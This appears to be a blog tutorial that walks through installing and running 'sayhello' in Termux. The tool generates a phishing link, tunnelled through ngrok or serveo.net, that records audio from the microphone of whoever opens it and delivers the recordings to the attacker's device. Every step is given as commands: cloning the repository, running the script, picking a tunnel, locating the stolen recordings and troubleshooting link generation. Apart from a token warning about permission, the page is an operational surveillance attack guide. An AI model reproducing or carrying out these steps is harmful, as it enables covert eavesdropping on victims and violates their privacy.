How to install sayhello tool in termux | hack microphone using termux
Nowadays everyone is curious about what hacking is and how hackers can steal anyone's sensitive information in a second. It is a good sign that everyone is becoming aware. In this tutorial I am going to tell you about a script available in GitHub that can record audio files from the target phone and send them to the attacker's machine. let's see how to install sayhello tool in termux.
What is sayhello tool
How to install sayhello tool in termux
Step1
apt-get update
apt-get upgrade
Step2
Install the necessary dependencies to avoid all kinds of errors
pkg install git wget curl openssh php
Step3
Use the given command to clone the sayhello tool on Termux
git clone https://github.com/d093w1z/sayhello.git
Step4
Change the directory to sayhello
cd sayhello
ls
Step5
bash sayhello.sh
Here you need to select the port forwarding option, between ngrok and serveo.net you have to choose any one of them. But I will recommend you to select ngrok. Because sometimes serveo.net goes down.
And don't forget to turn on your mobile Hotspot while using ngrok otherwise the link might not be generate.
then it will start downloading ngrok,then start php server and then ngrok server.And after then we will generate the required link, as we can see in the given screen shot👇
Now you can copy that link and send it to anyone But I will warn you don't send this malicious link to anyone without his/her permission.To check it is working or not you can paste it on your web browser.
Where received audio files Will be stored
Received audio files will be stored inside the sayhello folder.And the location of the files will be
/data/data/com.termux/files/home/sayhello
Then you can move the files to your gallery by using the command
$ termux-setup-storage
Do it allow
$ mv <file name> /sdcard
How to fix the problem of link not generating on sayhello tool
Sometimes you may have to face link not generating problem on sayhello tool.If your link is not generating be patience and read the points which i have written below .
1.Be make sure that you have turned on your mobile Hotspot.
2.Your internet connection is stable.
In spite of doing this if link is not generating you can follow a different way
Open your web browser and search http://127.0.0.1:4040 .Here you will find the link which you did not find in sayhello
- Get link
- X
- Other Apps





Comments
Post a Comment